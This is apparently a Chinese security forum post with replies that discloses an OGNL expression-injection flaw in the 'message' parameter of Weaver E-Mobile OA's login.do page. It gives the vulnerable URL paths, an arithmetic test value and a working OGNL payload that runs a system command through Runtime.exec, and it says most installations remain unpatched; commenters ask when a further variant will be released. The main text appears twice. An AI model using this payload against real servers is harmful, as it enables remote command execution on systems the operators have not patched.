Ognl表达式注入?命令执行?你来判断。
自评TCV = 0
泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前,老师丢给我玩的,叫我学习一下。
拿到的时候一脸懵逼,什么是表达式注入?去漏洞库看了一圈。(・。・) 噢!原来可以执行算术运算就是表达式注入呀!要怎么玩?当计算器用么?~ヾ(*´∇`)ノ
一、泛微OA E-Mobile WebServer:Apache 通用部分:apache
官方有两个OA。一个是apache的 一个是Resin的。
Resin的也找到姿势通杀了,但是Resin涉及的站太大了。。。暂时不放出来,因为好像和S2撞洞了?因为045打了WAF的 ,我这个可以执行命令。23333 我也不知道~
1、登录页面如下
2、当账号密码报错的时候,出现如下URL
3、计算器
o(>ω<)o 这么神奇么~
4、命令执行
泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前,老师丢给我玩的,叫我学习一下。
拿到的时候一脸懵逼,什么是表达式注入?去漏洞库看了一圈。(・。・) 噢!原来可以执行算术运算就是表达式注入呀!要怎么玩?当计算器用么?~ヾ(*´∇`)ノ
一、泛微OA E-Mobile WebServer:Apache 通用部分:apache
官方有两个OA。一个是apache的 一个是Resin的。
Resin的也找到姿势通杀了,但是Resin涉及的站太大了。。。暂时不放出来,因为好像和S2撞洞了?因为045打了WAF的 ,我这个可以执行命令。23333 我也不知道~
1、登录页面如下
- http://6.6.6.6/login.do?
- or
- http://6.6.6.6/login/login.do?
2、当账号密码报错的时候,出现如下URL
3、计算器
- http://6.6.6.6/login.do?message=66*66*66-66666
o(>ω<)o 这么神奇么~
4、命令执行
- 有的表达式注入是${code}。这里隐藏了${},所以直接调用就行了。
- @org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
关于作者
wobushou
5篇文章
139篇回复
-
8楼
oopww
昨天 17:19寻求Resin姿势,范微不一定装了 E-Mobile
| @ta -
7楼
wobushou
5 天前 12:48这只猪:这个是新漏洞还是什么情况情况。。。
| @ta1新的,除了官方修复了,大部分还没修复。
| @ta -
6楼
这只猪
5 天前 10:11
这个是新漏洞还是什么情况情况。。。
| @ta -
5楼
wobushou
6 天前 10:08jkrow:
Resin啥时候放出来
| @ta1一个星期后吧。
| @ta -
4楼
jkrow
6 天前 10:04Resin啥时候放出来
| @ta -
3楼
wobushou
7 天前 20:39byyun189:
执行不了但是运算message=66*66*66-66666能显示结果这是阿帕奇版本。
| @ta1你多试几个看看?
| @ta -
2楼
byyun189
7 天前 20:09
执行不了但是运算message=66*66*66-66666能显示结果这是阿帕奇版本。
| @ta -
1楼
byyun189
7 天前 20:07
为什么message=66*66*66-66666能显示结果。执行@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())不行尼?
评论8次